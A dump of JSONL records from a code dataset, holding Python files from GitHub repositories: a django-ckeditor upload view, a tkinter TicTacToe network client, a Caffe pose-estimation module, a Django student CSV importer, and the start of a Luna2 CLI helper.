\"currently at version %s\" % filebrowser.VERSION)\n else:\n upload_file_view = _upload_file\n\n # Create a dict on the request object that will be modified by the\n # filebrowser_post_upload signal receiver in ckeditor/models.py\n fb_data = request._fb_data = {}\n\n # Call original view function.\n # Within this function, the filebrowser_post_upload signal will be sent,\n # and our signal receiver will add the filebrowser.base.FileObject\n # instance to request._fb_data[\"upload_file\"]\n upload_file_view(request)\n\n upload_file = fb_data.get('upload_file')\n if not upload_file:\n return HttpResponse(\"Error uploading file\")\n\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], upload_file.url))\n", "repo_name": "mickael9/django-ckeditor", "sub_path": "ckeditor/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 51, "usage_type": "call"}, {"api_name": "filebrowser.sites.site._upload_file", "line_number": 78, "usage_type": "attribute"}, {"api_name": "filebrowser.sites.site", "line_number": 78, "usage_type": "name"}, {"api_name": "filebrowser.VERSION", "line_number": 86, "usage_type": "attribute"}, {"api_name": "filebrowser.views._upload_file", "line_number": 88, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 102, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "18028367829", "text": "import threading\r\nimport json\r\nimport socket\r\nimport tkinter as tk\r\nimport config\r\n\r\nip = config.get_ip()\r\n\r\n\r\nclass TicTacToe_client:\r\n def __init__(self, port, name, root):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect((ip, port))\r\n self.sock.send(json.dumps(name).encode('utf-8'))\r\n self.width = 300\r\n self.height = 400\r\n self.btn_list = []\r\n self.root = tk.Toplevel(root)\r\n self.root.geometry(str(self.width) + 'x' + str(self.height))\r\n self.root.title('TicTacToe')\r\n self.root.resizable(False, False)\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.give_up)\r\n\r\n self.c = tk.Canvas(self.root)\r\n self.c.configure(height=self.height, width=self.width, bg='gray')\r\n self.c.pack()\r\n\r\n def give_up(self):\r\n self.sock.send(json.dumps('**||GIVEUP||**').encode('utf-8'))\r\n self.root.destroy()\r\n\r\n\r\n def draw_empty_board(self):\r\n # Creating a 3x3 table\r\n self.c.create_rectangle(0, 0, 300, 100, fill='black')\r\n self.c.create_text(150, 50, text='TicTacToe', font=('Jokerman', 30), fill='white', tags='text')\r\n for i in range(1, 4):\r\n self.c.create_line(0, 100 + i * 100, self.width, 100 + i * 100)\r\n self.c.create_line(i * 100, 100, i * 100, self.height)\r\n\r\n def val_btn(self, num):\r\n row = num // 3\r\n col = num % 3\r\n self.sock.send(json.dumps((row, col)).encode('utf-8'))\r\n\r\n def create_btns(self):\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(0),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(1),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(2),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(3),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(4),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(5),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(6),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(7),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(8),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n\r\n def drawGame(self, game_grid):\r\n self.c.delete('all')\r\n self.draw_empty_board()\r\n\r\n for row in range(3):\r\n for col in range(3):\r\n if game_grid[row][col] == 0:\r\n self.c.create_window(col * 100 + 50, 150 + row * 100, window=self.btn_list[row * 3 + col])\r\n elif game_grid[row][col] == 1:\r\n self.c.create_oval(col * 100 + 20, 120 + row * 100, 80 + col * 100, 180 + row * 100, width=2)\r\n elif game_grid[row][col] == 2:\r\n self.c.create_line(col * 100, 200 + row * 100, 100 + col * 100, 100 + row * 100, width=2,\r\n fill='black')\r\n self.c.create_line(col * 100, 100 + row * 100, 100 + col * 100, 200 + row * 100, width=2,\r\n fill='black')\r\n\r\n def draw_win_line(self, key):\r\n if key[-3:] == '--0':\r\n self.c.delete('text')\r\n self.c.create_text(150, 50, text='DRAW', font=('chiller', 40), fill='white')\r\n return\r\n key = key[4:]\r\n if key[0] == 'R':\r\n self.c.create_line(0, 150 + int(key[1]) * 100, self.width, 150 + int(key[1]) * 100, fill='red', width=4)\r\n elif key[0] == 'C':\r\n self.c.create_line(50 + int(key[1]) * 100, 100, 50 + int(key[1]) * 100, 400, fill='red', width=4)\r\n elif key[0:2] == 'DL':\r\n self.c.create_line(0, 100, 300, 400, fill='red', width=4)\r\n elif key[0:2] == 'DR':\r\n self.c.create_line(0, 400, 300, 100, fill='red', width=4)\r\n self.c.delete('text')\r\n string = key[2:] + ' Wins'\r\n self.c.create_text(150, 50, text=string, font=('chiller', 30), fill='white')\r\n\r\n def shut_down(self):\r\n self.root.destroy()\r\n\r\n def play_game(self):\r\n while True:\r\n received = False\r\n while not received:\r\n try:\r\n game_board = json.loads(self.sock.recv(4096).decode('utf-8'))\r\n received = True\r\n except json.decoder.JSONDecodeError:\r\n pass\r\n print(game_board)\r\n if game_board == 'move':\r\n self.c.delete('wait')\r\n self.c.create_text(300, 100, text='YOUR TURN', anchor='se', font=('Times New Roman', 12), fill='cyan', tag='move')\r\n for i in range(9):\r\n self.btn_list[i].configure(state='normal')\r\n elif game_board[:4] == 'OVER':\r\n self.c.delete('move')\r\n self.c.delete('wait')\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.shut_down)\r\n self.draw_win_line(game_board)\r\n break\r\n else:\r\n for i in range(9):\r\n self.btn_list[i].configure(state='disabled')\r\n self.c.delete('move')\r\n self.c.create_text(300, 100, text='WAIT', anchor='se', font=('Times New Roman', 12), fill='red', tag='wait')\r\n self.drawGame(game_board)\r\n\r\n def run(self):\r\n self.draw_empty_board()\r\n self.create_btns()\r\n self.drawGame([[0, 0, 0], [0, 0, 0], [0, 0, 0]])\r\n\r\n play = threading.Thread(target=self.play_game)\r\n play.start()\r\n\r\n # self.root.mainloop()\r\n", "repo_name": "AR-PyT/Gaming-Platform-with-Integrated-Chat", "sub_path": "tictactoe_client.py", "file_name": "tictactoe_client.py", "file_ext": "py", "file_size_in_byte": 6592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.get_ip", "line_number": 7, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 12, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 12, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 50, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 68, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 117, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 119, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "12224587916", "text": "#!/usr/bin/env python\n\n\"\"\"\npose_cpm.py: Convolutional Pose Machines.\nBased on @shihenw code:\nhttps://github.com/shihenw/convolutional-pose-machines-release/blob/master/testing/python/demo.ipynb\n\"\"\"\n__author__ = \"David Pascual Hernandez\"\n__date__ = \"2017/05/22\"\n\nimport math\nimport os\n\n# Avoids verbosity when loading Caffe model\nos.environ[\"GLOG_minloglevel\"] = \"2\"\n\nimport caffe\nimport cv2\nimport numpy as np\n\nfrom pose import PoseEstimator\n\nfrom matplotlib import pyplot as plt\n\n\ndef crop_human(sample, c, s, bsize):\n \"\"\"\n Crop human in the image depending on subject center and scale.\n @param sample: np.array - input image\n @param c: list - approx. human center\n @param s: float - approx. human scale wrt 200px\n @param bsize: int - boxsize\n @return: np.array - cropped human\n \"\"\"\n cx, cy = c\n\n # Resize image and center according to given scale\n im_resized = cv2.resize(sample, None, fx=s, fy=s)\n\n h, w, d = im_resized.shape\n\n pad_up = int(bsize / 2 - cy)\n pad_down = int(bsize / 2 - (h - cy))\n pad_left = int(bsize / 2 - cx)\n pad_right = int(bsize / 2 - (w - cx))\n\n # Apply padding or crop image as needed\n if pad_up > 0:\n pad = np.ones((pad_up, w, d), np.uint8) * 128\n im_resized = np.vstack((pad, im_resized))\n else:\n im_resized = im_resized[-pad_up:, :, :]\n h, w, d = im_resized.shape\n\n if pad_down > 0:\n pad = np.ones((pad_down, w, d), np.uint8) * 128\n im_resized = np.vstack((im_resized, pad))\n else:\n im_resized = im_resized[:h + pad_down, :, :]\n h, w, d = im_resized.shape\n\n if pad_left > 0:\n pad = np.ones((h, pad_left, d), np.uint8) * 128\n im_resized = np.hstack((pad, im_resized))\n else:\n im_resized = im_resized[:, -pad_left:, :]\n h, w, d = im_resized.shape\n\n if pad_right > 0:\n pad = np.ones((h, pad_right, d), np.uint8) * 128\n im_resized = np.hstack((im_resized, pad))\n else:\n im_resized = im_resized[:, :w + pad_right, :]\n\n return im_resized\n\n\ndef map_resize(new_shape, heatmap):\n # Resizes the output back to the size of the test image\n scale_y = new_shape[0] / float(heatmap.shape[0])\n scale_x = new_shape[1] / float(heatmap.shape[1])\n map_resized = cv2.resize(heatmap, None, fx=scale_x, fy=scale_y,\n interpolation=cv2.INTER_CUBIC)\n\n return map_resized\n\n\nclass PoseCPM(PoseEstimator):\n def __init__(self, model_fname, boxsize, sigma, confidence_th=0.3):\n \"\"\"\n Constructs Estimator class.\n @param model_fname: Caffe models\n @param weights: Caffe models weights\n \"\"\"\n PoseEstimator.__init__(self, model_fname, boxsize, confidence_th)\n self.model, self.weights = self.model_fname\n self.sigma = sigma\n self.gauss_map = self.gen_gaussmap()\n\n def init_net(self):\n caffe.set_mode_gpu()\n self.net = caffe.Net(self.model, self.weights, caffe.TEST)\n\n def estimate(self):\n \"\"\"\n Estimates human pose.\n @param im: np.array - input image\n @param gaussmap: np.array - Gaussian map\n @return: np.array: articulations coordinates\n \"\"\"\n if not self.net:\n self.init_net()\n\n # Adds gaussian map channel to the input\n input_4ch = np.ones((self.im.shape[0], self.im.shape[1], 4))\n input_4ch[:, :, 0:3] = self.im / 256.0 - 0.5 # normalize to [-0.5, 0.5]\n input_4ch[:, :, 3] = self.gauss_map\n\n # Adapts input to the net\n input_adapted = np.transpose(np.float32(input_4ch[:, :, :, np.newaxis]),\n (3, 2, 0, 1))\n self.net.blobs['data'].reshape(*input_adapted.shape)\n self.net.blobs['data'].data[...] = input_adapted\n\n # Estimates the pose\n output_blobs = self.net.forward()\n pose_map = np.squeeze(self.net.blobs[output_blobs.keys()[0]].data)\n\n return pose_map\n\n def gen_gaussmap(self):\n \"\"\"\n Generates a grayscale image with a centered Gaussian\n @param sigma: float - Gaussian sigma\n @return: np.array - Gaussian map\n \"\"\"\n gaussmap = np.zeros((self.boxsize, self.boxsize, 1))\n for x in range(self.boxsize):\n for y in range(self.boxsize):\n dist_sq = (x - self.boxsize / 2) * (x - self.boxsize / 2) \\\n + (y - self.boxsize / 2) * (y - self.boxsize / 2)\n exponent = dist_sq / 2.0 / self.sigma / self.sigma\n gaussmap[y, x, :] = math.exp(-exponent)\n\n return np.squeeze(gaussmap)\n\n def get_coords(self, sample, human_bbox, get_pose_maps=False):\n \"\"\"\n Estimate human pose given an input image.\n @param sample: np.array - original input image\n @param human: np.array - cropped human image\n @param config: dict - CPM settings\n @param model: pose estimator object\n @param c: np.array - human center\n @param s: int - human scale\n @param viz: bool - flag for joint visualization\n @return: np.array - joint coords\n \"\"\"\n caffe.set_mode_gpu()\n\n (ux, uy), (lx, ly) = human_bbox\n\n # # Get scale\n # scale = float(self.boxsize) / (np.max([np.abs(ux - lx), np.abs(uy - ly)]) + 50)\n #\n # # Get center\n # cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n #\n # im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # # plt.figure(), plt.imshow(im_human), plt.show()\n\n # Get scale\n scale = float(self.boxsize) / sample.shape[0]\n # Get center\n cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # plt.figure(), plt.imshow(im_human), plt.show()\n\n self.im = im_human.copy()\n\n pose_map = self.estimate()\n\n joint_coords = []\n for joint_map in pose_map:\n joint_map_resized = map_resize(self.im.shape, joint_map)\n\n # Find joint heatmap maxima\n joint = [-1, -1]\n if joint_map_resized.max() >= self.confidence_th:\n joint = list(np.unravel_index(joint_map_resized.argmax(),\n joint_map_resized.shape))\n\n # Back to full coordinates\n joint[0] = (joint[0] - (self.boxsize / 2) + cy) / scale\n joint[1] = (joint[1] - (self.boxsize / 2) + cx) / scale\n\n joint_coords.append(joint)\n\n joint_coords = np.array([[int(x), int(y)] for y, x in joint_coords])\n\n if get_pose_maps:\n return joint_coords, pose_map\n else:\n return joint_coords\n\n\nif __name__ == \"__main__\":\n model_fname = [\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_deploy_resize.prototxt\",\n \"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_iter_320000.caffemodel\"]\n sigma = 21\n\n boxsizes = [384, 192, 128, 92]\n\n from matplotlib import pyplot as plt\n plt.figure()\n\n for idx, boxsize in enumerate(boxsizes):\n pe = PoseCPM(model_fname, boxsize, sigma)\n\n im = cv2.imread(\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Samples/nadal.png\")\n bbox = np.array([[237, -21], [597, 338]])\n joints, pose_maps = pe.get_coords(im, bbox, get_pose_maps=True)\n print(pose_maps.shape)\n\n # plt.figure()\n # plt.subplot(441), plt.imshow(pe.im[:, :, ::-1])\n # for idx in range(pose_maps.shape[0]):\n # plt.subplot(4, 4, idx + 2), plt.imshow(pose_maps[idx])\n # plt.show()\n\n limbs = [1, 2, 3, 4, 4, 5, 6, 7, 7, 8, 9, 10, 10, 11, 12, 13, 13, 14]\n limbs = np.array(limbs).reshape((-1, 2)) - 1\n\n colors = [[0, 0, 255], [0, 170, 255], [0, 255, 170], [0, 255, 0],\n [170, 255, 0], [255, 170, 0], [255, 0, 0], [255, 0, 170],\n [170, 0, 255]]\n\n\n def draw_estimation(im, bbox, joints, limbs, colors, stickwidth=6):\n upper, lower = bbox\n cv2.rectangle(im, tuple(upper), tuple(lower), (0, 255, 0), 3)\n\n for i, (p, q) in enumerate(limbs):\n px, py = joints[p]\n qx, qy = joints[q]\n\n if px >= 0 and py >= 0 and qx >= 0 and qy >= 0:\n m_x = int(np.mean(np.array([px, qx])))\n m_y = int(np.mean(np.array([py, qy])))\n\n length = ((px - qx) ** 2. + (py - qy) ** 2.) ** 0.5\n angle = math.degrees(math.atan2(py - qy, px - qx))\n polygon = cv2.ellipse2Poly((m_x, m_y),\n (int(length / 2), stickwidth),\n int(angle), 0, 360, 1)\n cv2.fillConvexPoly(im, polygon, colors[i])\n\n if px >= 0 and py >= 0:\n cv2.circle(im, (px, py), 3, (0, 0, 0), -1)\n if qx >= 0 and qy >= 0:\n cv2.circle(im, (qx, qy), 3, (0, 0, 0), -1)\n\n return im\n\n im_drawn = draw_estimation(im, bbox, joints, limbs, colors)\n plt.subplot(2, 2, idx + 1), plt.title(\"Boxsize = %dpx\" % boxsize), plt.imshow(im_drawn[:, :, ::-1])\n plt.show()\n\n", "repo_name": "RoboticsLabURJC/2017-tfm-david-pascual", "sub_path": "src/Estimator/Pose/pose_cpm.py", "file_name": "pose_cpm.py", "file_ext": "py", "file_size_in_byte": 9334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pose.PoseEstimator", "line_number": 88, "usage_type": "name"}, {"api_name": "pose.PoseEstimator.__init__", "line_number": 95, "usage_type": "call"}, {"api_name": "pose.PoseEstimator", "line_number": 95, "usage_type": "name"}, {"api_name": "caffe.set_mode_gpu", "line_number": 101, "usage_type": "call"}, {"api_name": "caffe.Net", "line_number": 102, "usage_type": "call"}, {"api_name": "caffe.TEST", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 137, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 145, "usage_type": "call"}, {"api_name": "caffe.set_mode_gpu", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 232, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 249, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 252, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.ellipse2Poly", "line_number": 253, "usage_type": "call"}, {"api_name": "cv2.fillConvexPoly", "line_number": 256, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 259, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}]} +{"seq_id": "23137312673", "text": "import logging\nimport string\nfrom datetime import datetime\nimport random\n\nimport pandas as pd\nfrom django.contrib.auth import get_user_model\nfrom django.utils.text import slugify\n\nfrom rest_framework import permissions\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom members.models import PersonalProfile\nfrom students.models import Student\nfrom students.serializers import StudentSerializer\n\nUser = get_user_model()\n\n\ndef generate_random_password():\n chars = string.ascii_letters + string.digits + string.punctuation\n return ''.join((random.choice(chars)) for x in range(20))\n\n\ndef process_students_data_file(full_file_path):\n logging.info(msg='Reading inputs')\n student_data = pd.read_csv(full_file_path)\n for row_index in student_data.index:\n reg_no = student_data['reg_no'][row_index]\n birth_date = student_data['birth_date'][row_index]\n birth_date = datetime.strptime(birth_date, '%d/%m/%Y').date()\n first_name = student_data['first_name'][row_index]\n middle_name = student_data['middle_name'][row_index]\n last_name = student_data['last_name'][row_index]\n degree = student_data['degree'][row_index]\n department = student_data['department'][row_index]\n reg_year = int(student_data['reg_year'][row_index])\n pass_year = int(student_data['grad_year'][row_index])\n gender = student_data['gender'][row_index]\n email = student_data['email'][row_index]\n email = str(email).lower().replace(' ', '')\n contact = student_data['contact'][row_index]\n student_info = {\n 'reg_no': reg_no,\n 'birth_date': birth_date,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'degree': degree.lower().replace(' ', ''),\n 'department': department,\n 'reg_year': reg_year,\n 'pass_year': pass_year,\n 'gender': gender[0]\n }\n logging.info(msg=f'Processing {student_info} with {email} and {contact}')\n try:\n student = Student.objects.create(**student_info)\n if email:\n username = slugify(email)\n user_info = {\n 'username': username,\n 'email': email,\n 'name': f'{first_name} {last_name}',\n }\n user = User.objects.create_user(username=username,\n email=email,\n password=generate_random_password())\n user.name = f'{first_name} {last_name}'\n try:\n user.save()\n member_info = {\n 'user': user,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'gender': gender[0],\n 'student': student,\n 'birth_date': student.birth_date,\n 'phone': contact\n }\n try:\n member = PersonalProfile.objects.create(**member_info)\n except Exception as ex:\n logging.error(msg=f'{member_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{user_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{student_info}', extra=ex)\n\n\nclass StudentViewSet(ModelViewSet):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass BatchUploadStudentsView(GenericAPIView):\n permission_classes = (permissions.IsAuthenticated, permissions.IsAdminUser,)\n\n def put(self, request, *args, **kwargs):\n students_data_file = request.FILES.get('file')\n with students_data_file.file as csv_file:\n process_students_data_file(csv_file)\n return Response(status=204)\n", "repo_name": "harshalgalgale/alumni-api", "sub_path": "students/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4222, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 20, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "students.models.Student.objects.create", "line_number": 60, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 60, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 62, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects.create", "line_number": 85, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "members.models.PersonalProfile", "line_number": 85, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 87, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 89, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 94, "usage_type": "name"}, {"api_name": "students.models.Student.objects.all", "line_number": 95, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 95, "usage_type": "name"}, {"api_name": "students.serializers.StudentSerializer", "line_number": 96, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 100, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 101, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "41493983062", "text": "__author__ = \"Sumit Sharma\"\n__copyright__ = \"Copyright 2022, Luna2 Project [CLI]\"\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = \"Sumit Sharma\"\n__email__ = \"sumit.sharma@clustervision.com\"\n__status__ = \"Development\"\n\nimport os\nfrom time import time, sleep\nimport base64\nimport binascii\nimport subprocess\nfrom random import randint\nfrom os import getpid\nfrom multiprocessing import Process\nfrom copy import deepcopy\nimport hostlist\nfrom termcolor import colored\nfrom nested_lookup import nested_lookup, nested_update, nested_delete, nested_alter\nfrom luna.utils.rest import Rest\nfrom luna.utils.log import Log\nfrom luna.utils.presenter import Presenter\nfrom luna.utils.constant import EDITOR_KEYS, BOOL_KEYS, filter_columns, sortby\nfrom luna.utils.message import Message\n\n\nclass Helper():\n \"\"\"\n All kind of helper methods.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor - As of now, nothing have to initialize.\n \"\"\"\n self.logger = Log.get_logger()\n\n\n def choice_to_bool(self, raw_data=None):\n \"\"\"\n This method will convert string choices to\n boolean\n \"\"\"\n for key in BOOL_KEYS:\n content = nested_lookup(key, raw_data)\n if content:\n if content[0] is not None:\n if content[0] == '':\n raw_data = nested_update(raw_data, key=key, value='')\n elif content[0].lower() in ['y', 'yes', 'true']:\n raw_data = nested_update(raw_data, key=key, value=True)\n else:\n raw_data = nested_update(raw_data, key=key, value=False)\n return raw_data\n\n\n def prepare_payload(self, table=None, raw_data=None):\n \"\"\"\n This method will prepare the payload.\n \"\"\"\n raw_data = self.choice_to_bool(raw_data)\n payload = {k: v for k, v in raw_data.items() if v is not None}\n for key in EDITOR_KEYS:\n content = nested_lookup(key, payload)\n if content:\n if content[0] is True:\n if table:\n get_list = Rest().get_data(table, payload['name'])\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n if get_list:\n value = nested_lookup(key, get_list)\n if value:\n content = self.open_editor(key, value[0], payload)\n payload = nested_update(payload, key=key, value=content)\n else:\n content = self.open_editor(key, None, payload)\n payload = nested_update(payload, key=key, value=content)\n elif content[0] is False:\n payload = nested_delete(payload, key)\n elif content[0]:\n if os.path.exists(content[0]):\n if os.path.isfile(content[0]):\n with open(content[0], 'rb') as file_data:\n content = self.base64_encode(file_data.read())\n payload = nested_update(payload, key=key, value=content)\n else:\n Message().error_exit(f'ERROR :: {content[0]} is a Invalid filepath.')\n else:\n content = self.base64_encode(bytes(content[0], 'utf-8'))\n payload = nested_update(payload, key=key, value=content)\n return payload\n\n\n def open_editor(self, key=None, value=None, payload=None):\n \"\"\"\n This Method will open a default text editor to\n write the multiline text for keys such as 